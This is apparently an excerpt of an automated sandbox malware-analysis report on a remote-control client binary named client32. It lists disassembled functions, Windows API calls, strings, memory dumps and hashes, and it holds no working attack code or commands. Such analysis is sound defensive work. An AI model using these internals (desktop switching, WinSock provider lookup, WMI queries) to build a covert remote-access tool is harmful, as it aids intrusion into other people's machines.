                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,03260EA0,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                • API String ID: 1594747848-1114959992
                                                                                • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$Sleep
                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                • API String ID: 2009458258-3774545468
                                                                                • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                Strings
                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                • API String ID: 2036220054-60805735
                                                                                • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                • GetLastError.KERNEL32 ref: 1115F275
                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                • API String ID: 1734919802-1728070458
                                                                                • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                • API String ID: 1976012330-1024648535
                                                                                • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,1B702977,00000000,?,00000000), ref: 110613A4
                                                                                • _malloc.LIBCMT ref: 110613EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1B702977,00000000), ref: 1106142B
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                • _free.LIBCMT ref: 110614A4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                • API String ID: 999355418-161875503
                                                                                • Opcode ID: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                • Opcode Fuzzy Hash: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1B702977,00000000,?), ref: 1115C927
                                                                                • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                • wsprintfW.USER32 ref: 1115C967
                                                                                • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                • wsprintfW.USER32 ref: 1115CA27
                                                                                • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                • API String ID: 3050498177-823534439
                                                                                • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                • _memset.LIBCMT ref: 11146055
                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                • API String ID: 4251163631-545709139
                                                                                • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1101567A
                                                                                • _memset.LIBCMT ref: 110156BE
                                                                                • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                Strings
                                                                                • PackedCatalogItem, xrefs: 110156E2
                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                • NSLSP, xrefs: 11015708
                                                                                • %012d, xrefs: 11015674
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
